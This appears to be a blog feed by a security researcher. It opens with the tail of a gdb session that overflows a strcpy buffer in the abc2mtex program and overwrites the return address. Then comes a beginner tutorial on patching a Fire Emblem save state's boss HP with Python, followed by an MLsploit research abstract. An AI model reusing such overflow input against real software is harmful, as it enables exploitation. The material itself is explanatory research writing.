<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="k">break</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">242</span>
<span class="nx">Breakpoint</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="mh">0x414c</span><span class="p">:</span><span class="w"> </span><span class="nx">file</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">,</span><span class="w"> </span><span class="nx">line</span><span class="w"> </span><span class="mi">242</span><span class="p">.</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">r</span><span class="w"> </span><span class="nx">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA</span>
<span class="nx">Starting</span><span class="w"> </span><span class="nx">program</span><span class="p">:</span><span class="w"> </span><span class="o">/</span><span class="nx">tmp</span><span class="o">/</span><span class="nx">tmp</span><span class="m m-Double">.4</span><span class="nx">jy8nhwOI3</span><span class="o">/</span><span class="nx">abc2mtex</span><span class="w"> </span><span class="nx">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA</span>
<span class="nx">Breakpoint</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="nx">openIn</span><span class="w"> </span><span class="p">(</span><span class="nx">filename</span><span class="p">=</span><span class="mh">0x7fffffffe240</span><span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="p"><</span><span class="nx">repeats</span><span class="w"> </span><span class="mi">120</span><span class="w"> </span><span class="nx">times</span><span class="p">>,</span><span class="w"> </span><span class="s">"FEDCBA"</span><span class="p">)</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">241</span>
<span class="mi">241</span><span class="w"> </span><span class="p">(</span><span class="nx">void</span><span class="p">)</span><span class="w"> </span><span class="nx">strcpy</span><span class="p">(</span><span class="nx">savename</span><span class="p">,</span><span class="nx">filename</span><span class="p">);</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">bt</span>
<span class="err">#</span><span class="mi">0</span><span class="w"> </span><span class="nx">openIn</span><span class="w"> </span><span class="p">(</span><span class="nx">filename</span><span class="p">=</span><span class="mh">0x7fffffffe240</span><span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="p"><</span><span class="nx">repeats</span><span class="w"> </span><span class="mi">120</span><span class="w"> </span><span class="nx">times</span><span class="p">>,</span><span class="w"> </span><span class="s">"FEDCBA"</span><span class="p">)</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">241</span>
<span class="err">#</span><span class="mi">1</span><span class="w"> </span><span class="mh">0x0000555555556f00</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="nx">main</span><span class="w"> </span><span class="p">(</span><span class="nx">argc</span><span class="p">=</span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="nx">argv</span><span class="p">=</span><span class="mh">0x7fffffffe4f8</span><span class="p">)</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">fields</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">273</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">c</span>
<span class="nx">Continuing</span><span class="p">.</span>
<span class="nx">Breakpoint</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="nx">openIn</span><span class="w"> </span><span class="p">(</span><span class="nx">filename</span><span class="p">=</span><span class="mh">0x7fffffffe240</span><span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="p"><</span><span class="nx">repeats</span><span class="w"> </span><span class="mi">120</span><span class="w"> </span><span class="nx">times</span><span class="p">>,</span><span class="w"> </span><span class="s">"FEDCBA"</span><span class="p">)</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">242</span>
<span class="mi">242</span><span class="w"> </span><span class="p">(</span><span class="nx">void</span><span class="p">)</span><span class="w"> </span><span class="nx">strcat</span><span class="p">(</span><span class="nx">filename</span><span class="p">,</span><span class="s">".abc"</span><span class="p">);</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">bt</span>
<span class="err">#</span><span class="mi">0</span><span class="w"> </span><span class="nx">openIn</span><span class="w"> </span><span class="p">(</span><span class="nx">filename</span><span class="p">=</span><span class="mh">0x7fffffffe240</span><span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="p"><</span><span class="nx">repeats</span><span class="w"> </span><span class="mi">120</span><span class="w"> </span><span class="nx">times</span><span class="p">>,</span><span class="w"> </span><span class="s">"FEDCBA"</span><span class="p">)</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">abc</span><span class="p">.</span><span class="nx">c</span><span class="p">:</span><span class="mi">242</span>
<span class="err">#</span><span class="mi">1</span><span class="w"> </span><span class="mh">0x0000414243444546</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="p">??</span><span class="w"> </span><span class="p">()</span>
<span class="err">#</span><span class="mi">2</span><span class="w"> </span><span class="mh">0x00007fffffffe4f8</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="p">??</span><span class="w"> </span><span class="p">()</span>
<span class="err">#</span><span class="mi">3</span><span class="w"> </span><span class="mh">0x0000000200000000</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="p">??</span><span class="w"> </span><span class="p">()</span>
<span class="err">#</span><span class="mi">4</span><span class="w"> </span><span class="mh">0x0000000000000000</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="p">??</span><span class="w"> </span><span class="p">()</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">c</span>
<span class="nx">Continuing</span><span class="p">.</span>
<span class="nx">file</span><span class="w"> </span><span class="s">"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA"</span><span class="w"> </span><span class="nx">does</span><span class="w"> </span><span class="k">not</span><span class="w"> </span><span class="nx">exist</span>
<span class="nx">Program</span><span class="w"> </span><span class="nx">received</span><span class="w"> </span><span class="nx">signal</span><span class="w"> </span><span class="nx">SIGSEGV</span><span class="p">,</span><span class="w"> </span><span class="nx">Segmentation</span><span class="w"> </span><span class="nx">fault</span><span class="p">.</span>
<span class="mh">0x0000414243444546</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="p">??</span><span class="w"> </span><span class="p">()</span>
<span class="p">(</span><span class="nx">gdb</span><span class="p">)</span><span class="w"> </span><span class="nx">quit</span>
</code></pre></div>A Beginner's Guide to Hacking Video Game Save States (Fire Emblem 7 on the GBA)2019-06-22T13:00:00-04:002019-06-22T13:00:00-04:00Carter Yagemanntag:carteryagemann.com,2019-06-22:/save-state-hacking-for-beginners.html<p>As a fun change of pace, I decided to write up a beginner's guide to hacking save states for video games.
In this tutorial, we're going to take a look at <a href="https://en.wikipedia.org/wiki/Fire_Emblem_%28video_game%29">Fire Emblem 7</a>
for the <a href="https://en.wikipedia.org/wiki/Game_Boy_Advance">Game Boy Advance</a> (GBA). Specifically, we're going to hack
the health bar of the …</p><p>As a fun change of pace, I decided to write up a beginner's guide to hacking save states for video games.
In this tutorial, we're going to take a look at <a href="https://en.wikipedia.org/wiki/Fire_Emblem_%28video_game%29">Fire Emblem 7</a>
for the <a href="https://en.wikipedia.org/wiki/Game_Boy_Advance">Game Boy Advance</a> (GBA). Specifically, we're going to hack
the health bar of the final boss (spoilers!) to be 1 HP. In doing so, I'll cover the simplest practical reverse engineering
technique for game hacking: <em>differential analysis</em>. I'll be using an emulator for Android called
<a href="https://play.google.com/store/apps/details?id=com.johnemulators.johngbalite">John GBA</a>, so we'll also get into
a few details about how it works.</p>
<p>Conceptually, this guide is very similar to the start of the tutorial provided by <a href="https://en.wikipedia.org/wiki/Cheat_Engine">Cheat Engine</a>.
The main difference with this writeup is we're going to hack an actual video game by modifying an emulator's
save state data rather than using a debugger on a running toybox program. Also, I'm going to perform all the steps
using only standard GNU/Linux programs and a little bit of Python scripting. Thus, this guide is intended for readers familiar
with basic programming and terminal CLI who may not have considered hacking a video game before and want a simple realistic example
to get started.</p>
<p>Enjoy.</p>
<h2>A Primer on Emulators & Save States</h2>
<p>I'll start with a brief summary of what an emulator is. Put simply, it reads a program written for one computer architecture
and executes it on another. In our case, the emulator I'm using can run games written for the GBA on an Android device. The most basic way
of accomplishing this is using <em>interpretation</em>. Specifically, the emulator mimics the original architecture by allocating
memory to represent RAM, CPU registers, etc. It then loads the program into the memory just as the emulated system would
and steps through each instruction, modifying the memory accordingly. The collective data values contained in the emulated hardware at
any given point is the <em>emulation state</em>.</p>
<p>Interpretation is the easiest form of emulation to implement, but slow because each hardware instruction on the original system is translated into
one or more (often many) instructions on the emulator's hardware. To get around this, real emulators often compile and optimize the
emulation logic "on-the-fly" using a technique called <em>just-in-time (JIT) compilation</em>. Optimizing emulators is an interesting topic
for discussion, but beyond the scope of this guide.</p>
<p>What we do need to understand is save states. By pausing the emulation and storing all the data associated with the emulation state, the emulator
can return to that state at any later time. All it has to do is read the saved state back into the memory representing the emulated
hardware. This gives us a clean way to hack video games by intentionally corrupting save states. All we have to do is modify some data
in the saved state and when the emulator loads it, it'll propagate our modifications into the emulated system:</p>
<p><center>
<img alt="Figure 1" src="https://carteryagemann.com/images/hacking-save-state-fig1.png">
</center></p>
<p>But in order to do that, we first have to figure out the formatting of the emulator's saved states.</p>
<h2>Reverse Engineering John GBA's Save State Format</h2>
<p>Lucky for us, this emulator's save state formatting is fairly standard and we don't need to understand most of the details for our basic
memory hack. First, we know the states have to be saved somewhere in storage. Turns out it's easy to find by just browsing:
<code><internal_shared_storage>/Johnemulators/GBA/state</code>. In this directory we find two file formats: <code>.jg#</code> and <code>.js#</code> where <code>#</code> is the slot
number for the save (organizing saves as a linear list of slots is typical for video game emulators). It's easy to see which files
we care about for Fire Emblem 7:</p>
<div class="highlight"><pre><span></span><code>$ ls -l
total 301
-rw------- 1 carter carter 113059 Jun 22 02:31 Fire Emblem (U).jg0
-rw------- 1 carter carter 108703 Jun 22 04:24 Fire Emblem (U).jg1
-rw------- 1 carter carter 18502 Jun 22 02:31 Fire Emblem (U).js0
-rw------- 1 carter carter 67051 Jun 22 04:24 Fire Emblem (U).js1
</code></pre></div>
<p>A good first step towards figuring out their formats is to run <code>file</code> and see if there are any recognizable patterns:</p>
<div class="highlight"><pre><span></span><code>$ file -i *
Fire Emblem (U).jg0: application/gzip; charset=binary
Fire Emblem (U).jg1: application/gzip; charset=binary
Fire Emblem (U).js0: image/jpeg; charset=binary
Fire Emblem (U).js1: image/jpeg; charset=binary
</code></pre></div>
<p>Much to our luck, despite the custom file extensions, each save state is actually just a JPEG image and a compressed data file. We don't need
to worry about the images, so let's focus on the data files. First, copy them off the Android device into a local directory. Also, make sure to
save a backup copy somewhere safe so you won't lose your data if you make a mistake! Next, let's decompress one of them:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># gzip expects compressed files to have the .gz extension,</span>
<span class="c1"># so we have to rename it first</span>
mv<span class="w"> </span>Fire<span class="se">\ </span>Emblem<span class="se">\ \(</span>U<span class="se">\)</span>.jg1<span class="w"> </span><span class="m">1</span>.gz
gzip<span class="w"> </span>-d<span class="w"> </span><span class="m">1</span>.gz
<span class="c1"># after decompressing, gzip will automatically strip the extension</span>
<span class="c1"># from the filename</span>
</code></pre></div>
<p>And take a look at the beginning of the data:</p>
<div class="highlight"><pre><span></span><code>$ hexdump -C 1 | head
00000000 0a 00 00 00 46 49 52 45 45 4d 42 4c 45 4d 45 00 |....FIREEMBLEME.|
00000010 41 45 37 45 00 00 00 00 00 00 00 00 01 00 00 00 |AE7E............|
00000020 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 d8 7d 00 03 00 00 00 00 00 00 00 00 |.....}..........|
00000040 00 00 00 00 1f 00 00 00 00 00 00 04 a0 7f 00 03 |................|
00000050 14 02 00 00 1c 00 00 00 12 00 00 60 1f 00 00 60 |...........`...`|
00000060 a0 7f 00 03 14 02 00 00 1f 00 00 60 00 00 00 00 |...........`....|
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000080 c0 7d 00 03 0c 02 00 00 d0 7f 00 03 70 fa 0b 08 |.}..........p...|
00000090 3f 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 |?..`............|
</code></pre></div>
<p>Another lucky break for us. We can see the canonical name for the game (<code>FIREEMBLEM</code>) at the beginning of the data. In fact, if we search
the game's ROM (the program as it's stored when it isn't running), we'll see the same name near it's beginning too:</p>
<div class="highlight"><pre><span></span><code>$ hexdump -C Fire\ Emblem\ \(U\).gba | grep -A 10 "FIREEMBLEM"
000000a0 46 49 52 45 45 4d 42 4c 45 4d 45 00 41 45 37 45 |FIREEMBLEME.AE7E|
000000b0 30 31 96 00 00 00 00 00 00 00 00 00 00 d1 00 00 |01..............|
000000c0 12 00 a0 e3 00 f0 29 e1 28 d0 9f e5 1f 00 a0 e3 |......).(.......|
000000d0 00 f0 29 e1 18 d0 9f e5 3c 11 9f e5 18 00 8f e2 |..).....<.......|
000000e0 00 00 81 e5 34 11 9f e5 0f e0 a0 e1 11 ff 2f e1 |....4........./.|
000000f0 f2 ff ff ea 00 7e 00 03 a0 7f 00 03 01 33 a0 e3 |.....~.......3..|
00000100 02 3c 83 e2 00 20 93 e5 02 18 a0 e1 21 18 a0 e1 |.<... ......!...|
00000110 00 00 4f e1 0b 40 2d e9 22 18 02 e0 02 0a 11 e2 |..O..@-.".......|
00000120 fe ff ff 1a 00 20 a0 e3 01 00 11 e2 26 00 00 1a |..... ......&...|
00000130 04 20 82 e2 02 00 11 e2 23 00 00 1a 04 20 82 e2 |. ......#.... ..|
00000140 04 00 11 e2 20 00 00 1a 04 20 82 e2 08 00 11 e2 |.... .... ......|
</code></pre></div>
<p>We now know that after decompressing, the data file contains the plain bytes of the game's memory. Next, we have to figure out which bytes
to overwrite in this 723 KB file.</p>
<h2>Differential Analysis</h2>
<p>The simplest reverse engineering technique for finding a data variable of interest is differential analysis. Remember that our goal is to
modify the health of the final boss for an easy victory. It's reasonable to assume that somewhere in the program's memory, there's an
integer that keeps track of of the current health. Also, since the game is actively running, this variable shouldn't be relocated in memory too
often. The question is: how do we find it?</p>
<p>We'll use differential analysis. Specifically, we'll save the game's state, inflict some damage on the boss, save the new state, inflict more
damage, save and so forth. Since this game shows the HP value and the damage of our attacks, we should know the exact health of the boss at
each state we save. All we need to do then is compare the memory of the states and find a location that contains the correct health value across
all the states.</p>
<h3>Creating Save States</h3>
<p>So let's begin. It's time to confront the big bad dragon at the end of Fire Emblem 7:</p>
<p><center>
<img alt="Figure 2" src="https://carteryagemann.com/images/fire-emblem-1.png">
</center></p>
<p>This overgrown lizard is quite the challenge if you approach him under leveled and without enough good equipment, but rather than working harder
by reloading a past save and redoing half the chapters, we're going to work smarter and show the boss who the real master of this game universe
is!</p>
<p>At our first save state, he's at full health. Unfortunately, this game is cheeky and hides his HP at the start of the fight:</p>
<p><center>
<img alt="Figure 3" src="https://carteryagemann.com/images/fire-emblem-2.png">
</center></p>
<p>This won't be a problem though because the game shows exactly how much damage we inflict:</p>
<p><center>
<img alt="Figure 4" src="https://carteryagemann.com/images/fire-emblem-3.png">
</center></p>
<p>In this case, Eliwood's sword will inflict 21 damage. He's seriously under powered, but can still survive the attack:</p>
<p><center>
<img alt="Figure 5" src="https://carteryagemann.com/images/fire-emblem-4.png">
</center></p>
<p>At this point, we make our second save state and note that we've inflicted 21 damage so far. As Athos prepares to cast magic on the foul beast,
we can now see the HP of the boss:</p>
<p><center>
<img alt="Figure 6" src="https://carteryagemann.com/images/fire-emblem-5.png">
</center></p>
<p>He had 99 HP when the second save was made, meaning he started with 120. Now Athos inflicts another 20 damage:</p>
<p><center>
<img alt="Figure 7" src="https://carteryagemann.com/images/fire-emblem-6.png">
</center></p>
<p>And we make a third save state. The HP of the boss at this save is 79:</p>
<p><center>
<img alt="Figure 8" src="https://carteryagemann.com/images/fire-emblem-7.png">
</center></p>
<p>Three states should be enough for our analysis, so it's time to transfer the data over to a computer and get hacking.</p>
<h3>The Analysis</h3>
<p>As I mentioned earlier, this is a differential analysis. We're looking for a memory location storing a variable that's 120 in the first state,
99 in the second and 79 in the third. In base 16, this is <code>0x78</code>, <code>0x63</code> and <code>0x4f</code>. Luckily, all these values are small enough to be encoded as
a single byte, so we can scan the game's memory linearly without having to consider factors like <a href="https://en.wikipedia.org/wiki/Data_structure_alignment">alignment</a>
or <a href="https://en.wikipedia.org/wiki/Endianness">endianness</a>. So let's get to work.</p>
<p>To speed up this analysis, I wrote a script in Python. This code is compatible with Python 2 and 3 and the comments are
self-explanatory:</p>
<div class="highlight"><pre><span></span><code><span class="p">:::</span><span class="n">python</span>
<span class="c1">#!/usr/bin/env python</span>
<span class="kn">from</span> <span class="nn">__future__</span> <span class="kn">import</span> <span class="n">print_function</span>
<span class="kn">import</span> <span class="nn">gzip</span>
<span class="kn">from</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="n">unpack</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="k">def</span> <span class="nf">decode_gzip</span><span class="p">(</span><span class="n">filepath</span><span class="p">):</span>
<span class="c1"># Python 2 and 3 decode byte I/O differently, this method ensures consistency</span>
<span class="k">with</span> <span class="n">gzip</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
<span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">version_info</span><span class="o">.</span><span class="n">major</span> <span class="o"><=</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">return</span> <span class="p">[</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'B'</span><span class="p">,</span> <span class="n">byte</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">byte</span> <span class="ow">in</span> <span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">()]</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="c1"># the names for my save state data files</span>
<span class="n">files</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'Fire Emblem (U).jg1'</span><span class="p">,</span>
<span class="s1">'Fire Emblem (U).jg2'</span><span class="p">,</span>
<span class="s1">'Fire Emblem (U).jg3'</span><span class="p">]</span>
<span class="c1"># the expected HP value in each save state</span>
<span class="n">hps</span> <span class="o">=</span> <span class="p">[</span><span class="mi">120</span><span class="p">,</span> <span class="mi">99</span><span class="p">,</span> <span class="mi">79</span><span class="p">]</span>
<span class="c1"># decompress the save states</span>
<span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="n">decode_gzip</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> <span class="k">for</span> <span class="n">file</span> <span class="ow">in</span> <span class="n">files</span><span class="p">]</span>
<span class="c1"># for each save state, find all the offsets that contain the expected HP value</span>
<span class="c1"># this is not the most efficient way of doing intersection search, but it's easier</span>
<span class="c1"># to read and efficient enough for our amount of data</span>
<span class="n">match_sets</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
<span class="k">for</span> <span class="n">state</span><span class="p">,</span> <span class="n">hp</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">hps</span><span class="p">):</span>
<span class="n">matches</span> <span class="o">=</span> <span class="p">[</span><span class="n">offset</span> <span class="k">for</span> <span class="n">offset</span><span class="p">,</span> <span class="n">byte</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">state</span><span class="p">)</span> <span class="k">if</span> <span class="n">byte</span> <span class="o">==</span> <span class="n">hp</span><span class="p">]</span>
<span class="n">match_sets</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">matches</span><span class="p">))</span>
<span class="c1"># we want the intersecting offsets across save states</span>
<span class="n">intersection</span> <span class="o">=</span> <span class="n">match_sets</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">intersection</span><span class="p">(</span><span class="o">*</span><span class="n">match_sets</span><span class="p">[</span><span class="mi">1</span><span class="p">:])</span>
<span class="c1"># sort and print the results</span>
<span class="n">offsets</span> <span class="o">=</span> <span class="p">[</span><span class="nb">hex</span><span class="p">(</span><span class="n">offset</span><span class="p">)</span> <span class="k">for</span> <span class="n">offset</span> <span class="ow">in</span> <span class="nb">sorted</span><span class="p">(</span><span class="nb">list</span><span class="p">(</span><span class="n">intersection</span><span class="p">))]</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">' '</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">offsets</span><span class="p">))</span>
</code></pre></div>
<p>Running the search on my states yields three candidate locations:</p>
<div class="highlight"><pre><span></span><code>$ python search.py
0x29222, 0x354b2, 0x91df3
</code></pre></div>
<p>It's common to get more than one candidate because depending on the game's logic, values like health might be maintained in multiple locations for
different purposes (e.g. for rendering it as text on the screen, detecting certain state triggers, etc.). As long as the number of results is few,
it's usually safe to just overwrite all of them. If the game crashes, we can always go back and make modifications more conservatively.</p>
<h3>Modifying a Save State</h3>
<p>Now that we know where to make our modifications, let's set the health of the boss to 1 HP! Here's another Python script to do just that:</p>
<div class="highlight"><pre><span></span><code><span class="p">:::</span><span class="n">python</span>
<span class="c1">#!/usr/bin/env python</span>
<span class="kn">from</span> <span class="nn">__future__</span> <span class="kn">import</span> <span class="n">print_function</span>
<span class="kn">import</span> <span class="nn">gzip</span>
<span class="kn">from</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="n">unpack</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="k">def</span> <span class="nf">decode_gzip</span><span class="p">(</span><span class="n">filepath</span><span class="p">):</span>
<span class="c1"># Python 2 and 3 decode byte I/O differently, this method ensures consistency</span>
<span class="k">with</span> <span class="n">gzip</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
<span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">version_info</span><span class="o">.</span><span class="n">major</span> <span class="o"><=</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">return</span> <span class="nb">bytearray</span><span class="p">([</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'B'</span><span class="p">,</span> <span class="n">byte</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">byte</span> <span class="ow">in</span> <span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">()])</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="nb">bytearray</span><span class="p">(</span><span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">())</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o"><</span> <span class="mi">4</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Usage:"</span><span class="p">,</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">"<state_file.jq> <patch_value> [<offsets> ...]"</span><span class="p">)</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="c1"># parse the command line arguments</span>
<span class="n">state_file</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">patch_value</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span>
<span class="n">offsets</span> <span class="o">=</span> <span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="k">for</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">3</span><span class="p">:]]</span>
<span class="c1"># read in the save state data</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">decode_gzip</span><span class="p">(</span><span class="n">state_file</span><span class="p">)</span>
<span class="c1"># overwrite the designated bytes</span>
<span class="k">for</span> <span class="n">offset</span> <span class="ow">in</span> <span class="n">offsets</span><span class="p">:</span>
<span class="n">data</span><span class="p">[</span><span class="n">offset</span><span class="p">]</span> <span class="o">=</span> <span class="n">patch_value</span>
<span class="c1"># write the new save state</span>
<span class="k">with</span> <span class="n">gzip</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">state_file</span> <span class="o">+</span> <span class="s1">'.patched'</span><span class="p">,</span> <span class="s1">'wb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
<span class="n">fd</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">data</span><span class="p">))</span>
</code></pre></div>
<p>Now we just apply the patch:</p>
<div class="highlight"><pre><span></span><code>$ python patch.py Fire\ Emblem\ \(U\).jg1 0x01 0x29222 0x354b2 0x91df3
</code></pre></div>
<p>Which will create a new save state with the filename of the original plus the suffix <code>.patched</code>. All that's left is to replace the original
save state in John GBA with our patched version and then we're ready to slay a dragon with ease.</p>
<h2>The Result</h2>
<p>Not so tough now, are we dragon?</p>
<p><center>
<img alt="Figure 9" src="https://carteryagemann.com/images/fire-emblem-8.png">
</center></p>
<p>And down it goes in one hit. How embarrassing:</p>
<p><center>
<img alt="Figure 10" src="https://carteryagemann.com/images/fire-emblem-9.png">
</center></p>
<p><center>
<img alt="Figure 11" src="https://carteryagemann.com/images/fire-emblem-10.png">
</center></p>
<h2>Conclusion</h2>
<p>So that's the most basic approach to hacking a video game save state. I hope you've found this guide entertaining and informative. I'd like
to reemphasize that this only scratches the surface of the broad area that is reverse engineering. The beauty of differential analysis is
we didn't have to know any low-level details about how the Game Boy Advance hardware behaves or the game's logic. This makes differential
analysis one of the most transferable techniques. That said, it also has limited applicability. For example, if the game developers wanted
to prevent tampering, even the most basic obfuscation (e.g. doubling every integer before storing it in memory) would thwart our analysis.
There are also fun hacks that cannot be implemented via a one-time memory patch (e.g. giving your character invincibility). So if you find
this topic interesting, I recommend checking out other tutorials floating around on the internet.</p>
<p>Thanks for reading and happy hacking.</p>MLSploit Extended Abstract to Appear in KDD 20192019-06-11T09:30:00-04:002019-06-11T09:30:00-04:00Carter Yagemanntag:carteryagemann.com,2019-06-11:/kdd-19.html<p>My coauthors and I will be presenting an extended abstract in the <a href="https://www.kdd.org/kdd2019/">25th Conference on Knowledge Discovery and Data Mining</a> (KDD'19)
in August.
Below is a preview:</p>
<p><strong>Title:</strong> MLsploit: A Framework for Interactive Experimentation with Adversarial Machine Learning Research</p>
<p><strong>Authors:</strong> Nilaksh Das, Siwei Li, Chanil Jeon, Jinho Jung, Shang-Tse Chen …</p><p>My coauthors and I will be presenting an extended abstract in the <a href="https://www.kdd.org/kdd2019/">25th Conference on Knowledge Discovery and Data Mining</a> (KDD'19)
in August.
Below is a preview:</p>
<p><strong>Title:</strong> MLsploit: A Framework for Interactive Experimentation with Adversarial Machine Learning Research</p>
<p><strong>Authors:</strong> Nilaksh Das, Siwei Li, Chanil Jeon, Jinho Jung, Shang-Tse Chen, Carter Yagemann, Evan
Downing, Haekyu Park, Evan Yang, Li Chen, Michael Kounavis, Ravi Sahita, David
Durham, Scott Buck, Polo Chau, Taesoo Kim, Wenke Lee</p>
<p><strong>Abstract:</strong> We present MLsploit, the first user-friendly, cloud-based system that enables researchers and practitioners to rapidly evaluate and compare state-of-the-art adversarial attacks and defenses for machine learning (ML) models. As recent advances in adversarial ML have revealed that many ML techniques are highly vulnerable to adversarial attacks, MLsploit meets the urgent need for practical tools that facilitate interactive security testing of ML models. MLsploit is jointly developed by researchers at Georgia Tech and Intel, and is <a href="https://mlsploit.github.io">open-source</a>. Designed for extensibility, MLsploit accelerates the study and development of secure ML systems for safety-critical applications. In this showcase demonstration, we highlight the versatility of MLsploit in performing fast-paced experimentation with adversarial ML research that spans a diverse set of modalities, such as bypassing Android and Linux malware, or attacking and defending deep learning models for image classification. We invite the audience to perform experiments interactively in real time by varying different parameters of the experiments or using their own samples, and finally compare and evaluate the effects of such changes on the performance of the ML models through an intuitive user interface, all without writing any code.</p>Barnum Paper to Appear in Information Security Conference 2019 